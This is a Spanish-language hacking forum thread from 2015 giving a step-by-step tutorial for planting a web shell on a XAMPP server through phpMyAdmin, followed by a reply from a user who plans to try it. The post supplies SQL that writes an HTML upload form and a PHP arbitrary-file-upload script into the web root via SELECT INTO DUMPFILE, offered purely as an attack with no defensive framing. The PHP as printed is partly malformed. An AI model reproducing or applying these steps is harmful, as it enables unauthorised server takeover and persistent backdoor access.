Sólo texto | Texto con Imágenes

Underc0de

[In]Seguridad Informática => Bugs y Exploits => Pentesting => Mensaje iniciado por: Decode en Julio 09, 2015, 03:29:07 PM

Título: Subir shell desde phpmyadmin (xampp)
Publicado por: Decode en Julio 09, 2015, 03:29:07 PM
Hola gente, aquí les vengo a enseñar como subir una shell desde phpmyadmin:

1- Lo primero que debemos hacer es tener acceso al phpmyadmin.
2- Luego crear una base de datos dentro del phpmyadmin con el nombre que quieran.
3- Luego de que la base de datos este creada nos vamos a SQL y empezamos a poner los siguientes códigos:

El primero es este:

Código [Seleccionar]
CREATE TABLE `NOMBRE DE LA DB`.`userform` (
`track1` VARCHAR( 1000 ) NOT NULL
) ENGINE = MYISAM ;

Luego de haber hecho esto debemos dar a continuar y poner un nuevo código, que es este:

Código [Seleccionar]
CREATE TABLE `NOMBRE DE LA DB`.`user_upload` (
`track2` VARCHAR( 1000 ) NOT NULL
) ENGINE = MYISAM ;

Luego de haber hecho este segundo paso insertamos el nuevo código con los mismos pasos anteriores, que es este:

Código [Seleccionar]
insert into userform values ('<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"

"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Upload</title>
</head>
<body bgcolor="black">
<div style=" color:white;text-align:center; margin-top:60px; font-size:25px;
">Upload</div>
<div style="padding-top:75px;margin-left:450px;width:340px; height:70px;">
<form enctype="multipart/form-data" action="upload.php" method="post">
<input name="userfile" type="file" />&nbsp;
<input type="submit" value="Upload" />
</form>
</div>
</body>
</html>');

Luego de haber insertado el tercer código nos vamos a lo siguiente:

Código [Seleccionar]
select * into dumpfile 'C:/xampp/htdocs/form.php' from userform

Luego de haber hecho este paso insertaremos el siguiente código con los mismos pasos anteriores:

Código [Seleccionar]
INSERT INTO user_upload
VALUES (
"<?php $uploaddir 'C:/xampp/htdocs/'$uploadfile $uploaddir basename($_FILES['userfile']['name']); if 

(move_uploaded_file($_FILES['userfile']['tmp_name'],$uploadfile)) { print '<body bgcolor=black></br></br><div 

align=center><font size=5 color=white>File uploaded successfully</font></body>'; } else { print '<body 

bgcolor=black></br></br><div align=center><font size=5 color=red>Error when uploading the file</font></body>'; } ?> "
)

Ya hecho este penúltimo paso nos vamos al último código que nos dará el privilegio de subir la shell al directorio principal del servidor:

Código [Seleccionar]
select * into dumpfile 'C:/xampp/htdocs/upload.php' from user_upload

Ya terminado todos estos pasos tendremos el privilegio de subir shell al directorio principal y tener acceso al servidor o host. Para dirigirnos al upload debemos ir a http://website.com/form.php y así podremos subir la shell.

Saludos.
Título: Re:Subir Shell A PhpMyAdmin [Xampp]
Publicado por: DeBobiPro en Julio 09, 2015, 04:51:14 PM
Interesante BRO!

andaba buscando algo así, lo probaré y les cuento como me va.



Saludos!
Sólo texto | Texto con Imágenes